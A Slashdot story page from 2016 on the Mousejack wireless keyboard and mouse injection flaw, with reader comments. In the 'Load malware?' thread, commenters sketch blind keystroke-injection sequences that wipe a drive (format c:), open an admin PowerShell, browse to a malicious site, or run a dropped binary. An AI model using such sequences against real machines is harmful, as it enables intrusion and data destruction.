Mousejack Attacks Exploit Wireless Keyboards and Mice (threatpost.com)

← Back to Stories (view on slashdot.org)

Mousejack Attacks Exploit Wireless Keyboards and Mice (threatpost.com)

Posted by yaelk on Tuesday February 23, 2016 @07:04AM from the under-attack dept.

msm1267 writes: Researchers have discovered a vulnerability in the USB devices that support wireless keyboards and mice that could put a countless number of devices at risk to attack. Seven manufacturers have been informed of the flaw, but as of today, only Logitech has produced a firmware update. Some have no update mechanism and can never be patched. The issue lies in the fact that some of the commands from the peripheral device to the dongle are not encrypted. Most do not authenticate packets and an attacker within close proximity and using a USB transmitting malicious packets over radio frequency can trick the victim's machine into accepting mouse clicks impersonating keystrokes. It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.

112 comments

Min score:

Reason:

Sort:

BnBH by Anonymous Coward · 2016-02-23 07:06 · Score: 0

Heh heh. You said "dongle."
1. Re:BnBH by Anonymous Coward · 2016-02-23 12:02 · Score: 0
  
  Shitlord spotted! Creeper card!
And that, ladies and gentlemen... by Chris+Mattern · 2016-02-23 07:07 · Score: 3, Insightful

...is why you should be using bluetooth instead of cheaping out. Saves a USB port, too!
1. Re:And that, ladies and gentlemen... by wardrich86 · 2016-02-23 07:18 · Score: 4, Interesting
  
  Saves a USB port, too!
  But you'd need a Bluetooth dongle to get that connection... so you'd still be out a USB port. Not sure of many PC's that come with native Bluetooth support
2. Re:And that, ladies and gentlemen... by Gojira+Shipi-Taro · 2016-02-23 07:20 · Score: 1
  
  Dunno. My ~4 year old ASUS motherboard has bluetooth on board.
  
  --
  "Oh my God. This is terrible. This is the end of my Presidency. I'm fucked."; ~ Donald J. Trump
3. Re:And that, ladies and gentlemen... by Chris+Mattern · 2016-02-23 07:21 · Score: 1
  
  I was assuming a laptop, which almost always has built-in Bluetooth. A desktop with no Bluetooth I'd just use a wire.
4. Re:And that, ladies and gentlemen... by hondo77 · 2016-02-23 07:37 · Score: 2
  
  Not sure of many PC's that come with native Bluetooth support.
  Besides iMacs, which have had it for ten years.
  
  --
  I live ze unknown. I love ze unknown. I am ze unknown.
5. Re:And that, ladies and gentlemen... by squiggleslash · 2016-02-23 07:43 · Score: 1
  
  Unfortunately the bluetooth mouse and keyboard market isn't particularly well served. Widgets exist, but 99% of them are aimed at tablets or phones. Mice support in particular is fairly dire.
  Hopefully that'll change soon...
  
  --
  You are not alone. This is not normal. None of this is normal.
6. Re:And that, ladies and gentlemen... by BlueLightning · 2016-02-23 07:45 · Score: 1
  
  Or, just use a wired keyboard and mouse. Wireless keyboard on a desk has always seemed particularly ridiculous to me - the thing doesn't need to move, so why is having a cable an issue?
7. Re: And that, ladies and gentlemen... by arielCo · 2016-02-23 08:00 · Score: 1
  
  Not every user of a "desktop" computer sits in front of a desk; some sit on a bed or couch (HTPC anyone?). Then there are those who just don't like wires for aesthetic reasons.
  
  --
  This post contains no rudeness or derision of any kind. All arguments are friendly. Terms and exclusions may apply.
8. Re:And that, ladies and gentlemen... by U2xhc2hkb3QgU3Vja3M · 2016-02-23 08:03 · Score: 1
  
  And then there's the %#@%$@ mess on my desktop always getting in the way of the mouse's cable.
9. Re:And that, ladies and gentlemen... by Anonymous Coward · 2016-02-23 08:08 · Score: 0
  
  > I was assuming a laptop, which almost always has built-in Bluetooth.
  True, but many (most?) PC laptops don't have enough range to use a Bluetooth keyboard or mouse. We bought a case of Logitech keyboards and mice, and for the vast majority of Dell laptops we tried them with, they wouldn't work with our setup. When you move the laptop to the side of dual monitors, the keyboards no longer have the range to work. All of the Dells worked with the keyboard placed immediately to the left of the laptop, but when you move it back to a docking station placed to the right of the monitors, they no longer work.
10. Re:And that, ladies and gentlemen... by NormalVisual · 2016-02-23 08:22 · Score: 1
  
  I wish Dell still made the MNY-RAQ-DEL2. I bought four of them when I found a batch of new old stock on eBay.
  
  --
  Please stand clear of the doors, por favor mantenganse alejado de las puertas
11. Re:And that, ladies and gentlemen... by Aaden42 · 2016-02-23 08:23 · Score: 1
  
  Used to be the case that the reaction time on non-BT wireless was quicker. It wasn't necessarily cheaping out as the proprietary solution actually provided a benefit. More overhead in the BT protocol meant more lag. Not sure if that's still true with current BT hardware/software stacks.
  Not something you'd notice typing in the office, but gamers...
12. Re: And that, ladies and gentlemen... by Anonymous Coward · 2016-02-23 08:24 · Score: 0
  
  Most motherboards made in the last 5 or 6 years also have it. Just the entry level workstation oem stuff has lacked it for the most part.
13. Re:And that, ladies and gentlemen... by Anonymous Coward · 2016-02-23 08:26 · Score: 0
  
  I feel sorry for you, stuck with an outdated insecure version bluetooth that could be alleviated by updating your dongle. :)
14. Re: And that, ladies and gentlemen... by Anonymous Coward · 2016-02-23 08:28 · Score: 0
  
  This. The Dells just don't have enough range to work with Bluetooth keyboards or mice.
15. Re: And that, ladies and gentlemen... by Anonymous Coward · 2016-02-23 08:38 · Score: 0
  
  The range on the Dell laptops sucks. We have 18 conference rooms with Dell Lattitude E6440 laptops connected to big plasma TVs, and the keyboards will only work from the chairs closest to the laptop. Even then the range isn't enough in the conference rooms that have outside windows. I assume that is from RF interference.
16. Re:And that, ladies and gentlemen... by I4ko · 2016-02-23 08:54 · Score: 1
  
  and I wish Microsoft still made Microsoft Bluetooth Notebook Mouse 5000 which was about the best mouse I ever used. I do have 3 of them, but recently got a Logitech M535 that is not too bad, but a little bigger than I would like.
17. Re: And that, ladies and gentlemen... by Anonymous Coward · 2016-02-23 09:02 · Score: 0
  
  you're crazy saying most
  that's a broad generalization for sure. i just bought a new motherboard, cpu, and ram. very few of the motherboards besides the flagship models had bluetooth integrated
18. Re:And that, ladies and gentlemen... by tlhIngan · 2016-02-23 09:04 · Score: 1
  
  Used to be the case that the reaction time on non-BT wireless was quicker. It wasn't necessarily cheaping out as the proprietary solution actually provided a benefit. More overhead in the BT protocol meant more lag. Not sure if that's still true with current BT hardware/software stacks.
  Not something you'd notice typing in the office, but gamers...
  The other problem I had with Bluetooth is stuck keys or sticky keys caused by flaky signals. I used to use an Apple Bluetooth keyboard with my Mac Mini. It worked, but if the distance increased beyond a few feet, it was unreliable and keys would randomly get stuck as the key down report gets received, while the keyboard is trying to send a key up report. End result is you can get a stuck modifier key or a repeating typable key until the keyboard finally reconnects.
  Replaced it with a Logitech, never had a problem since - no stuck keys and response time seemed way quicker.
  Though I wonder - the Unifying receivers Logitech have require pairing devices together - not as sophisticated as Bluetooth, but you have to go into the app and tell it to pair devices at which point it searches for the first device to be power cycled. Which would mean physical access to the machine is required and thus a way to install malware way quicker and easier.
19. Re:And that, ladies and gentlemen... by Anonymous Coward · 2016-02-23 09:13 · Score: 0
  
  http://www.amazon.com/Dell-Y-RAQ-DEL2-Bluetooth-Wireless-Compatible/dp/B00E0NU91S
20. Re:And that, ladies and gentlemen... by Anonymous Coward · 2016-02-23 09:14 · Score: 0
  
  But if you don't use wireless, how is your electric meter supposed to be able to inject/sample your data?
  (They generally use two r.f. bands, one in the same range as WiFi for local interfaces and a lower frequency with more power for linking. Of course the WiFi chip in your laptop may be accessible without you explicitly turning it on, a bit like the built-in microphone and camera.)
  Isn't it nice that the do everything copier/fax/scanner/printer you've got has the potential to share images of even your photocopied docs through your electric meter even if you don't have a computer or net connection?
  Don't say anything mean to the fridge, or it may tell your car to drive you off a cliff.
21. Re:And that, ladies and gentlemen... by castionsosa · 2016-02-23 09:37 · Score: 1
  
  This is a good point... realistically, why do the wireless keyboard/mouse makers use their own protocol, which is most likely far less secure than something designed by people who know what they are doing? BT is a relatively open protocol that has stood the test of time. Yes, it has had its security issues, but after 10+ years, it is pretty robust, and is definitely good enough, assuming proper pairing with 4-6 digit PINs (and re-pairing happens very infrequently.) If one needs more security, it can be handled at the application layer.
  When I see some mouse or keyboard requiring its own dongle, I move on. If they are too cheap to use an industry standard for their stuff, then I'm suspecting they skimped on security somewhere else.
22. Re: And that, ladies and gentlemen... by castionsosa · 2016-02-23 10:01 · Score: 1
  
  I wonder if a $10 dongle would remedy the situation with most laptops.
  Realistically, in a dense office environment, it might be better to just go with wired devices, to minimize congestion on the airwaves.
23. Re:And that, ladies and gentlemen... by KGIII · 2016-02-23 10:39 · Score: 1
  
  I know this is gonna sound strange, but when it comes to input devices like keyboards and mice, I've had really good luck with Microsoft. I dunno who's making 'em or if they're just rebadged OEM stuff but they're pretty good. I noticed quite by accident and not entirely intentionally. They're good enough that I've stuck with 'em for a long time and have been really happy given the times I've had to use other products.
  
  --
  "So long and thanks for all the fish."
24. Re:And that, ladies and gentlemen... by CSMoran · 2016-02-23 10:45 · Score: 1
  
  Wireless keyboard on a desk has always seemed particularly ridiculous to me - the thing doesn't need to move, so why is having a cable an issue?
  But the keyboard does move -- usually to temporarily make room for something else: notepad, snacks, book, body parts. And then the cable invariably trips either the wine glass or the coffee cup. The wireless signals have a better track record of not doing that.
  
  --
  Every end has half a stick.
25. Re:And that, ladies and gentlemen... by Anonymous Coward · 2016-02-23 11:02 · Score: 0
  
  Maybe if your PC is 10 years old. BT has been on every mobo for ages.
26. Re:And that, ladies and gentlemen... by Anonymous Coward · 2016-02-23 14:21 · Score: 0
  
  Not my 1.5 year old i3 Asus. It's probably in the chipset, but it is not available to Windows or Linux. Weird. This system was $300 and works great for what it is.
  Don't assume everything has bluetooth. Even if some devices have bluetooth, it is broken enough for me to not want to have to deal with it on a daily basis. Cheap giveaway smartphones like the ZTEs often display this behavious.
27. Re:And that, ladies and gentlemen... by radarskiy · 2016-02-23 15:38 · Score: 1
  
  You have a better chance that your computer already has Bluetooth than it has some random proprietary wireless method.
28. Re:And that, ladies and gentlemen... by drinkypoo · 2016-02-23 15:39 · Score: 1
  
  But you'd need a Bluetooth dongle to get that connection... so you'd still be out a USB port. Not sure of many PC's that come with native Bluetooth support
  Most laptops, many all-in-ones, and a few desktops have bluetooth built in. Of course, it's usually attached to the USB bus... but not always
  
  --
  "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
29. Re:And that, ladies and gentlemen... by Gaygirlie · 2016-02-23 16:16 · Score: 1
  
  I've seen a mere couple of desktop-mobos with BT in them, and those only in advertisements. None of the desktop-mobos I've actually gotten my hands on have had BT integrated. Then again, I don't live in fantasy-land.
30. Re:And that, ladies and gentlemen... by Gaygirlie · 2016-02-23 16:21 · Score: 1
  
  Who are you to say keyboard doesn't have to move? I move my keyboard all the time, even though I use it on the desk. Wireless devices are much more convenient since there is no need to fiddle with cables when you have to temporarily move something around.
31. Re:And that, ladies and gentlemen... by Coisiche · 2016-02-23 22:16 · Score: 1
  
  I'm the only person in my office that still uses wired keyboard and mouse and I don't find it inconvenient at all. My mug of tea sits between the keyboard and mouse cables and there have been no mishaps.
32. Re:And that, ladies and gentlemen... by Aaden42 · 2016-02-24 00:46 · Score: 1
  
  Not strange... I've got MS keyboards plugged into both of my Macs. Feels like ordering a Coke & Pepsi cocktail, but they're decent keyboards. Still holding out hope for finding a decent clicky microswitch (like IBM XT period keyboards) that has an ergonomic split and doesn't cost my first born, but until then... MS keyboards, Logitech mice.
33. Re:And that, ladies and gentlemen... by wardrich86 · 2016-02-24 00:53 · Score: 1
  
  That's true, but I can't see wireless KBM packages coming with bluetooth adapters any time soon... though if they switch to Bluetooth, it might make the dongles more available and possibly cheaper.
34. Re: And that, ladies and gentlemen... by Anonymous Coward · 2016-02-24 03:30 · Score: 0
  
  Another problem could be the keyboard manu, or even low output &| cheap batteries. The latter is an issue is one I noticed with my mouse.
35. Re:And that, ladies and gentlemen... by gordguide · 2016-02-27 09:38 · Score: 1
  
  This is a good point... realistically, why do the wireless keyboard/mouse makers use their own protocol, which is most likely far less secure than something designed by people who know what they are doing? BT is a relatively open protocol that has stood the test of time. Yes, it has had its security issues, but after 10+ years, it is pretty robust, and is definitely good enough, assuming proper pairing with 4-6 digit PINs (and re-pairing happens very infrequently.) If one needs more security, it can be handled at the application layer.
  When I see some mouse or keyboard requiring its own dongle, I move on. If they are too cheap to use an industry standard for their stuff, then I'm suspecting they skimped on security somewhere else.
  I don't know one way or the other, so this is pure speculation, but it may be a cost issue. Some may scoff, but virtually any difference in wholesale / production level quantity costs beyond the trivial usually means one wins overwhelmingly over the other. A case in point ... Firewire chips (the original 400 MHz versions) were about $25 in wholesale / 1000 qty versus USB 1.1 at around $15. FW has significant performance advantages over USB, not the least of which is it is fully self-managing whereas USB requires management by the host CPU and CPU cycles to function, which also makes the number of USB buses available in the motherboard an issue. But that $10 price difference pretty much killed the FW in the market, even in areas where the performance differences were significant (eg Audio or Video where real-time performance is important in a way that made buffering a poor solution, so USB management could cause dropped frames, etc).
  Computing and Computer peripherals are a bit more cut-throat as far as these manufacturers' choices go compared to other industries so even small differences in cost make one option overwhelmingly supported versus another.
  Like I said earlier, no idea if this played a role in some manufacturers' choosing WiFi over Bluetooth (and this would be BT 2 with 10m range) but certainly it's possible.
1. Wireless 2. Secure. by Anonymous Coward · 2016-02-23 07:09 · Score: 2

Pick one.
Security is always a trade-off, where you decide how determined your attacker is going to be, and weigh that against convenience.
If you're choosing wireless peripherals, you are leaning so far toward the "convenient" that you're wasting your time if you think any other security measures can make up for it.
Wires for the win, again, for now. by Anonymous Coward · 2016-02-23 07:10 · Score: 0

Wireless security, lol.
No way by the_skywise · 2016-02-23 07:11 · Score: 5, Funny

There's no way my wireless keyboard could ever be hacked in this fashion beca I MADE $125,000 YEAR BY USING THESE SIMPLE STEPS - CLICK HERE TO LEARN MORE http://888999444333.ze/?bypass...
1. Re:No way by fzammett · 2016-02-23 07:27 · Score: 2
  
  DING! WINNER! Internet won! Time to go home everyone, we're done for the day!
  
  --
  If a pion (n-) collides with a proton in the woods & noone is there to hear it, does lamdba decay into the source pa
2. Re:No way by Krishnoid · 2016-02-23 07:48 · Score: 0
  
  Silly person -- using a keyboard that &$*#@78g9789%^&#$%^&@$# -- wait, switching to my wired keyboard now. Using a keyboard that can be hijacked like that.
  Hold on, my malfunctioning wireless keyboard is blinking something on the LEDs -- S-I-G-N-A-L-J-A-M-M-E-D-N-O-C-A-R-R ...
3. Re:No way by KGIII · 2016-02-23 10:42 · Score: 1
  
  Ah, one of my favorite quotes is from a buddy of mine who had lived in the Deep South... "I ain't never scared."
  Your link doesn't resolve. Yes, yes I did click it. I figured someone had to.
  
  --
  "So long and thanks for all the fish."
I've always suspected that USB isn't secure by Anonymous Coward · 2016-02-23 07:24 · Score: 0

It's an enhancement of the really old serial ports, from a time when security wasn't really a concern. USB isn't encrypted and therefore is vulnerable. Perhaps it's time to move on to better standards and abandon USB for the vulnerable dinosaur it is.
1. Re:I've always suspected that USB isn't secure by Anonymous Coward · 2016-02-23 07:48 · Score: 0
  
  It's an enhancement of the really old serial ports, from a time when security wasn't really a concern. USB isn't encrypted and therefore is vulnerable. Perhaps it's time to move on to better standards and abandon USB for the vulnerable dinosaur it is.
  The issue isn't USB, it's the wireless communication between the receiver and the mouse. Doesn't matter how that receiver is actually plugged into your system.
  Also, this isn't really news, and you shouldn't expect your wireless mouse or keyboard to provide security. The "encryption" is primarily so that when you have a hundred people in an room all using wireless input devices, the cross-talk doesn't cause problems.
Cuz, You're A Moron by Anonymous Coward · 2016-02-23 07:50 · Score: 0

Cuz no one ever cracked Bluetooth or highjacked a Bluetooth device with it's super secret 0000 pin.
But, there's nothing quite as satisfying as the squishy lag that Bluetooth gives HID devices. Online gamers especially love it.
1. Re:Cuz, You're A Moron by sims+2 · 2016-02-23 08:08 · Score: 1
  
  Oh the part I hate is the connect delay you get with bluetooth.
  If I want to type "The quick brown fox jumps over the lazy dog" on a bluetooth keyboard that has been left idle by the time I finish typing the keyboard has just reconnected and I get "og"
  You don't have that problem with most of the proprietary wireless spec keyboards and mice.
  
  --
  Minimum threshold fixed. Thanks!
2. Re:Cuz, You're A Moron by Anonymous Coward · 2016-02-23 08:18 · Score: 0
  
  gamers
  The ultimate morons, they should just buy some overpriced gaming mouse with blue leds and a cooling fan for their greasy hands.
  Meanwhile I'm enjoying the superior qualities of interrupt-based PS/2.
3. Re: Cuz, You're A Moron by Anonymous Coward · 2016-02-23 11:58 · Score: 0
  
  Oh boy, you can move your mouse around while your OS is locked up. I'm sure that's extremely useful.
4. Re:Cuz, You're A Moron by Burz · 2016-02-23 17:26 · Score: 1
  
  Bluetooth is closed and poorly vetted. Do not count on it being secure.
Risk Level by David_Hart · 2016-02-23 07:54 · Score: 1

Just how much of a risk is there to this exploit?
"A Logitech spokesman told the MIT Technology review that the company has a software update to fix the issue, but that the vulnerability Bastille detected “would be complex to replicate” since it requires being physically close to the victim, which makes it “a difficult and unlikely path of attack.”
It seems to me that you would have to be fairly close to the system that you are attacking as the USB plug doesn't have a lot of power or range. Yes, an attacker could install a repeater. But that too requires physical access. Plus, you have to know what type of system you are attacking (UNIX vs Windows), etc. It does seem like Logitech makes a good point even though they may have a vested interest in downplaying it.
1. Re:Risk Level by gstoddart · 2016-02-23 08:06 · Score: 1
  
  Just how much of a risk is there to this exploit?
  How much of a potential reward is there?
  Things like this usually show it's technically feasible, even if impractical. But if the payoff is high enough, it's probably worth someone doing.
  Today's "too difficult to replicate" can easily become "tomorrow's hack in the wild". But if someone sees enough possible payoff for doing it, it's just one more thing.
  And it seems there's always someone looking to exploit anything just because it's there.
  
  --
  Lost at C:>. Found at C.
2. Re:Risk Level by wonkey_monkey · 2016-02-23 08:35 · Score: 1
  
  Just how much of a risk is there to this exploit?
  The answer is "enough." I can't imagine coming under this kind of attack myself, but it should be cause enough for a targettable company that deals with sensitive (valuable) data to think twice about rolling out wireless keyboards/mice.
  
  it requires being physically close to the victim['s computer]
  which could be on the other side of a locked door, or a (fairly thin) wall, or a floor...
  
  --
  systemd is Roko's Basilisk.
3. Re:Risk Level by Anonymous Coward · 2016-02-23 08:55 · Score: 0
  
  If you really can implement this so that you could have it scripted to run in a couple of seconds, I'd imagine you could set up a wardriving system pretty easily and just drive around. If you just ran it for Windows you'd get the majority of systems. In densly populated areas I bet you'd get a lot of victims within an hour.
4. Re:Risk Level by dbIII · 2016-02-23 14:05 · Score: 1
  
  With credit card details entered via keyboard the reward could be enormous.
  With such an obvious motive I have zero sympathy for the utter losers that rushed their product out the door with inadequate security. The products are not fit for the purpose they are designed for.
5. Re:Risk Level by gstoddart · 2016-02-23 14:32 · Score: 1
  
  With such an obvious motive I have zero sympathy for the utter losers that rushed their product out the door with inadequate security.
  Of course, the problem with that is that the "losers that rushed their product out the door with inadequate security" aren't the people we need to feel sorry for in this case ... like every other piece of shit consumer technology with non-existent security, it's the consumer who suffers.
  Put the makers of this tech on the hook for paying damages, or throw the CEOs in jail .. then I might give a second though to them.
  And, really, even if a CEO could personally face jail time, I still can't give a fuck.
  
  --
  Lost at C:>. Found at C.
Mousejack? by Lead+Butthead · 2016-02-23 07:56 · Score: 2

I thought someone is deploying tools to give rodents hand jobs, and that was terribly odd to be on /.

--
ELOI, ELOI, LAMA SABACHTHANI!?
Load malware? by Cigaes · 2016-02-23 08:11 · Score: 1, Insightful

“It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.”
Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?
For a particular target, a way can probably be devised, but it will most likely be slow and visible. And not work with the next target.
Injecting keys is clearly a security flaw with severe consequences, but over-hyping it is unproductive.
1. Re:Load malware? by wonkey_monkey · 2016-02-23 08:25 · Score: 3, Informative
  
  Really? With just keystrokes and mouse moves?
  Yup. Actually, just keystrokes - the summary's a bit confused on the subject, but the article says nothing about spoofing mouse moves and clicks - it does, however, say that in some cases an attacker can impersonate the mouse but use it to send keypress packets (the keyboards in question encrypt these, but the receiver accepts them unencrypted from the "mouse").
  
  but it will most likely be slow and visible
  Not necessarily. What if you want access to a computer you can see through a window (and verify that no-one is near), but is behind a locked door? Even if you can't see the screen, sending Win+R c m d [enter] and so on seems fairly doable.
  
  --
  systemd is Roko's Basilisk.
2. Re:Load malware? by Anonymous Coward · 2016-02-23 08:27 · Score: 0
  
  Send this sequence of keys, with no feedback:"Winlogo+R, cmd, format c:" It's not fancy malware, but it will sure ruin your day.
3. Re:Load malware? by Firethorn · 2016-02-23 08:27 · Score: 1
  
  Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?
  start-button->cmd->ftp(malware site & file)->execute downloaded malicious file.
  as long as the start button isn't actually up when you do it, it should have a reasonable chance of success.
  
  --
  I don't read AC A human right
4. Re:Load malware? by Cigaes · 2016-02-23 08:37 · Score: 1
  
  What's a “start button”? :-
  And to wonkey_monkey: what would “òcmd” achieve? “ò” is the character that XTerm generates with win-R.
  To achieve anything, you need either feedback (“see through a window”) or strong assumptions about the user interface currently running.
5. Re:Load malware? by NormalVisual · 2016-02-23 08:53 · Score: 1
  
  Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?
  
  On Windows, sure:
  
  Win-R
  "powershell" + Enter
  "start-process powershell -verb runas" + Enter
  one left-arrow key
  Enter
  
  This should work on practically any Windows install that includes PowerShell and is at a live desktop. You're now at an admin shell from which you can download whatever you want and run it. As you mentioned, all of this activity will be visible, but if you're away from the keyboard and it's not locked, then you're hosed.
  
  --
  Please stand clear of the doors, por favor mantenganse alejado de las puertas
6. Re:Load malware? by Cigaes · 2016-02-23 08:56 · Score: 1
  
  So it works in certain cases with a lot of assumptions. Exactly what I was saying.
7. Re:Load malware? by NormalVisual · 2016-02-23 09:14 · Score: 1
  
  You asked for keystrokes/mouse moves only, with no feedback about where they went. I provided a practical example that will work for a lot of machines, that's all.
  
  --
  Please stand clear of the doors, por favor mantenganse alejado de las puertas
8. Re:Load malware? by txmason · 2016-02-23 09:28 · Score: 1
  
  “It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.”
  Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?
  Win-R -> http://www.malicious-site.com/ -> flash exploit (or whatever)
  matter of seconds.
9. Re:Load malware? by Cigaes · 2016-02-23 09:41 · Score: 1
  
  Read the other replies before posting the same thing.
10. Re:Load malware? by countach · 2016-02-23 09:50 · Score: 1
  
  "With no feedback about where the keystrokes and clicks end up?"
  I'm guessing most OSes have a hot key to access the menu, from there you can start an appropriate terminal using just keystrokes, and once in a terminal, well.... it's open slather. Don't dismiss what can be done with just keystrokes.
11. Re:Load malware? by Dragonslicer · 2016-02-23 09:56 · Score: 1
  
  So it works in certain cases with a lot of assumptions. Exactly what I was saying.
  Where "certain cases with a lot of assumptions" equals "a computer running a recent version of Windows". I'm guessing that there might be a few of those out there.
12. Re:Load malware? by Cigaes · 2016-02-23 10:11 · Score: 1
  
  But “most OSes have” is not commutative: for most OSes, there may be a key, but there is no single key common to all OSes and user environment. So basically, without feedback, you can expect to take over microsoft's gaming environment, nothing more. There are bigger security holes in it.
13. Re:Load malware? by Anonymous Coward · 2016-02-23 10:58 · Score: 0
  
  Strong assumption?
  Not really.
  Windows 90%
  Mac 10%
  Linux 0%
  (rounded)
  Just assume Windows with common/default configuration and send appropriate keys. Job done.
14. Re:Load malware? by Anonymous Coward · 2016-02-23 11:04 · Score: 0
  
  99% of the time you can assume someone using a cheap usb keyboard/mouse is on Windows because Mac users use the expensive BT stuff Apple hoists onto them and Linux desktop/laptop users really don't exist beyond 1%.
15. Re:Load malware? by KGIII · 2016-02-23 11:12 · Score: 1
  
  The terminal is *usually* mapped to CTRL + ALT + T with *most* distros that I've actually dug into. I've noticed one that didn't do that, I think I've made it so it *does* do that on that VM. I can dig it back out. I didn't check it on all of 'em nor have I tried all of 'em. I'm pretty sure that if I can get that close to the device, I can take a minute to figure out what the OS is. Hell, I can probably find the layout and then write a shim and mirror it over a replicated desktop and map mouse movements, all with something the size of a Pi - and I'm not even remotely skilled. If I can do that... If there's a command prompt of any type then, well... There's usually a shortcut to bring it up.
  It has been a while but you used to be able to hit CTRL + TAB, then TAB, then down either two or three times and press Enter. That will open IE, OE is at the top, and MSN is the second one down (I think?) - on a default Windows install that is "locked down" so you can't use a mouse. It works even if you can't *see* the mouse or even bring up the desktop. It worked for 98, 98se, ME, NT, and 2k (though I think those had the IE icon moved so it was just two down button presses). I have not tried it with Vista, 7, etc... It probably works. I'm pretty sure that was the combination? I've not used Windows in a while so I can't really go check that for you.
  Ah well... Yeah, you can do a lot with being able to intercept and inject at an input level. If you can read what's going through it AND alter or replace that input, you damned well own the device. If not, do some logging and you will.
  
  --
  "So long and thanks for all the fish."
16. Re: Load malware? by Anonymous Coward · 2016-02-23 12:05 · Score: 0
  
  Could just spam ctrl+alt+del forever and make your computer unusable.
17. Re:Load malware? by dbIII · 2016-02-23 14:09 · Score: 1
  
  Really? With just keystrokes and mouse moves?
  Yes. Keyboard shortcut to launch browser then URL.
  
  With no feedback about where the keystrokes and clicks end up?
  If you order it to download your rootkit or whatever you can get feedback from wherever you have hosted your little bit of nastiness to tell you that it has been picked up.
18. Re:Load malware? by Firethorn · 2016-02-23 14:10 · Score: 1
  
  What's a “start button”?
  The button that typically has the picture of a window on it.
  start->R gives you the ability to execute a command via type interface on windows. Use it to spawn a CLI shell. use CLI shell to write a script that spawns a process that downloads & executes the malware.
  Yes, it's operating system specific. So freaking what? So isn't the malware I'm going to attempt to load. There's not enough linux users out there to matter, as the AC mentions. Crackers, like terrorists, like to target soft targets. I'm trying to compromise computers, not your specific computer, normally speaking.
  I'm not an apple guy, so I don't know how I'd go about compromising one of them, given an open point.
  
  --
  I don't read AC A human right
19. Re:Load malware? by radarskiy · 2016-02-23 15:49 · Score: 1
  
  "without feedback"
  Except you do get feedback... whether your OS-specific exploit worked or not. If it does work, then the target is using that exploit. If not, try an exploit specific to a *different* OS. Start off just trying to ping a known address where you are logging, and note which stage gives you a ping that actually shows up in the log. Once you have identified the OS then you can get on with the real payload.
20. Re:Load malware? by NormalVisual · 2016-02-23 18:21 · Score: 1
  
  Where "certain cases with a lot of assumptions" equals "a computer running a recent version of Windows"
  
  And where "recent" equals "any version released in the last 10 years".
  
  --
  Please stand clear of the doors, por favor mantenganse alejado de las puertas
21. Re:Load malware? by complete+loony · 2016-02-23 21:37 · Score: 3, Informative
  
  Hack a computer just by typing? Absolutely.
  
  --
  09F91102 no, 455FE104 nope, F190A1E8 uh-uh, 7A5F8A09 that's not it, C87294CE no. Ah! 452F6E403CDF10714E41DFAA257D313F.
22. Re:Load malware? by Cigaes · 2016-02-23 21:48 · Score: 1
  
  Yes, just typing, and in a matter of seconds. Just typing: no seeing what you type, no knowing the keyboard layout, no knowing the user interface running, nothing except keys blindly. As was already pointed out by numerous persons before you posted your duplicated comment, this would work on lusers computers left to the default values. A rather costly attack (requires hardware and physical presence) that can only work generically on the most worthless of targets. Not really worrying. (Of course, for targeted attack, that is another story entirely.)
  Well, I suppose I shall expect still half a dozen of similar comments from self-styled geeks that are so proud to know the default keyboard shortcut for running a command on the only OS and desktop environment they know.
23. Re:Load malware? by Firethorn · 2016-02-23 23:06 · Score: 1
  
  testing with my Mint install: Alt-F2 instead, then gnome-terminal.
  or start button ->terminal
  both bring up a command prompt, which will allow you to(depending on settings) download and execute a file.
  assuming they're not stupid enough to run as root, they're at least limited to the user's rights unless an exploit exists; getting code to execute on the target machine is 90% of the work.
  
  --
  I don't read AC A human right
24. Re:Load malware? by complete+loony · 2016-02-23 23:23 · Score: 1
  
  Don't need to know the keyboard layout. Only need to guess that it's a window's machine that is unlocked. You could also move the mouse or perhaps press the scoll-lock key occasionally to prevent the screen saver from automatically starting.
  Unlike most of the other responses that I scanned through at the time, which required a browser exploit, or ftp access. This approach could be used to run arbitrary code without the assistance of a 3rd party server, or a known browser exploit. It only depended on Win+R, cmd, notepad and powershell. And I'm sure that list could be reduced further.
  
  --
  09F91102 no, 455FE104 nope, F190A1E8 uh-uh, 7A5F8A09 that's not it, C87294CE no. Ah! 452F6E403CDF10714E41DFAA257D313F.
25. Re:Load malware? by Cigaes · 2016-02-23 23:29 · Score: 1
  
  Two mistakes in your message:
  “Don't need to know the keyboard layout”: how do you type the ‘m’ in “cmd” on an AZERTY keyboard?
  “Arbitrary code”: no, only code that is already present on the computer. Typing binaries with just the keyboard and generic software is tricky.
26. Re:Load malware? by Anonymous Coward · 2016-02-24 03:45 · Score: 0
  
  I'm always the first one to run to the overhyped BS well, but injecting keystrokes == 100% pwned, and quick.
  Your thinking about "keystrokes" from an entirely user centric view. A more precise way to put it is, you can send ANY ascii char not just keys on a keyboard. Its entirely possible to send a 300 or 400 byte precompiled binary shell/trojan via ascii to notepad and simply "save" a function exec. All you need to know is the processor architecture and OS. Fortunately you only have the 1 architecture x86 and 3 possible executable formats. OSX/MACH, Linux/ELF or WinPE.
  In a *nix environment it may require slightly more work. rather than simply saving it from a text editor, you would save it as a script that echos your shellcode completely unescaped or eval'ed and pipe the clean echo into your exec. something like...
  ~#echo ~/nix.bin && chmod +x nix.bin && ./nix.bin
27. Re:Load malware? by complete+loony · 2016-02-24 11:03 · Score: 1
  
  We're talking about a targeted attack that requires local (-ish) access. Firstly you can probably assume the target has a locale appropriate to their location. However that isn't required, as a USB HID device can send raw 16-bit unicode.
  Did you really read that link?
  
  # our hex binary
  shell_exec = "4d5a90000300000004000....
  That's a hex dump of a PE .exe file. They then type a powershell script to convert it to binary. That's arbitrary code right there. Unless you have gone to unusual lengths to prevent the launching of an .exe.
  
  --
  09F91102 no, 455FE104 nope, F190A1E8 uh-uh, 7A5F8A09 that's not it, C87294CE no. Ah! 452F6E403CDF10714E41DFAA257D313F.
"mouse clicks impersonating keystrokes" by wonkey_monkey · 2016-02-23 08:18 · Score: 1

mouse clicks impersonating keystrokes.
The article is clearer on what this suppoed to mean:

An attacker can impersonate the mouse but transmit keypress-packets

--
systemd is Roko's Basilisk.
Bluetooth range by Firethorn · 2016-02-23 08:24 · Score: 1

True, but many (most?) PC laptops don't have enough range to use a Bluetooth keyboard or mouse.
